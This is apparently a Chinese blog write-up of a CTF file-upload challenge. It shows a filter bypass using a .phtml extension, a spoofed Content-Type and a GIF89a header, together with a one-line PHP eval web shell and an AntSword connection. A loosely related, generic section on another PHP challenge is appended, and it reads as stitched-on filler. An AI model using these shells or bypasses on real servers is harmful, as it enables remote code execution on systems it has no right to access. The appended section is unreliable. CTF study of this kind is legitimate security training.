BUUCTF[极客大挑战 2019]Upload

正常上传一个php的一句话木马
在这里插入图片描述

可以看到提示说不是图片
接下去尝试抓包后修改文件名
在这里插入图片描述

Content-Type是文件扩展名,这里修改成image/jpg
看了下其他人解题,很多都用了phtml
phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析。将webshell.php改为webshell.phtm,然后用burpsuite截取上传数据包,将Content-Type的值改为image/jpg,然后发送数据包,返回的结果如下图所示,提示文件中包含<?,说明对php代码进行了过滤,虽然上传失败,但是从返回结果大概可以判断能够上传后缀名是phtml的文件,那么接下来就是要绕过<?的检测

在这里插入图片描述
因为服务端过滤了<?字符,所以不能只用用php语言,但是可以通过使用

在这里插入图片描述

<script language='php‘>@eval($_POST['abc']);</script>

在这里插入图片描述

这里还是不行,应该是这里不仅前端有检测,后端也有。这里可以用文件幻术头绕过,这个和图像检测的getimagesize()函数有关。
同时这里还能用图片马绕过

```powershell
`GIF89a? <script language='php>@eval($_POST['abc']);`</script>

(新建了个scriptshell.phtml文件)
在这里插入图片描述

在这里插入图片描述
返回上传成功的图片
接着蚁剑连接下一层一层目录找到flag
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

### BUUCTF 2019 PHP Easy 题目分析 #### 背景介绍 BUUCTF 是国内知名的 CTF 平台之一,其题目涵盖了多种安全领域。其中 PHP 类型的题目通常涉及反序列化漏洞、输入验证不足等问题。以下是针对 **BUUCTF 2019 PHP Easy** 的可能解题思路。 --- #### 反序列化漏洞基础 在 PHP 中,`serialize()` 和 `unserialize()` 函数分别用于对象的序列化和反序列化操作。如果开发者未对用户可控的数据进行严格校验,则可能导致反序列化漏洞的发生[^1]。 通过构造恶意的对象并将其传递给程序中的 `unserialize()` 方法,攻击者可以触发预期之外的行为,例如执行任意代码或访问敏感数据。 --- #### php://filter 协议的应用 PHP 提供了一些伪协议来处理特定场景下的文件流操作。例如: - `php://input`: 获取原始 POST 数据。 - `php://filter`: 对数据流应用过滤器,常用于绕过某些防护机制或读取文件内容。 当目标环境允许使用这些伪协议时,可以通过它们实现一些有趣的操作,比如以 Base64 编码形式读取远程脚本的内容[^2]。 --- #### 字符串查找函数 mb_strpos() 该函数返回指定子字符串首次出现的位置索引。需要注意的是,默认情况下它区分小写;另外还可以自定义字符集编码参数 `$encoding` 来适配多字节字符的需求[^3]。 此知识点虽然看似简单,但在实际利用过程中可能会被用来检测是否存在非法字符或者定位注入点等位置信息。 --- #### Payload 构造实例 假设题目存在 JSON 输入解析环节,并且服务器端会对提交过来的数据结构做进一步逻辑判断。那么我们可以尝试如下 payload: ```json { "Information": { "year": "2022abc", "items": [ 0, ["a"], "c" ] } } ``` 上述例子展示了如何精心设计嵌套数组以及特殊字段组合而成的有效载荷[^4]。当然具体形态还需依据实际情况调整优化。 --- #### 综合思考与建议 基于以上理论知识和技术手段,解决此类问题的关键在于深入理解官方给出的功能模块及其潜在缺陷所在之处。同时也要善于运用各种工具辅助完成调试工作。 ---
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值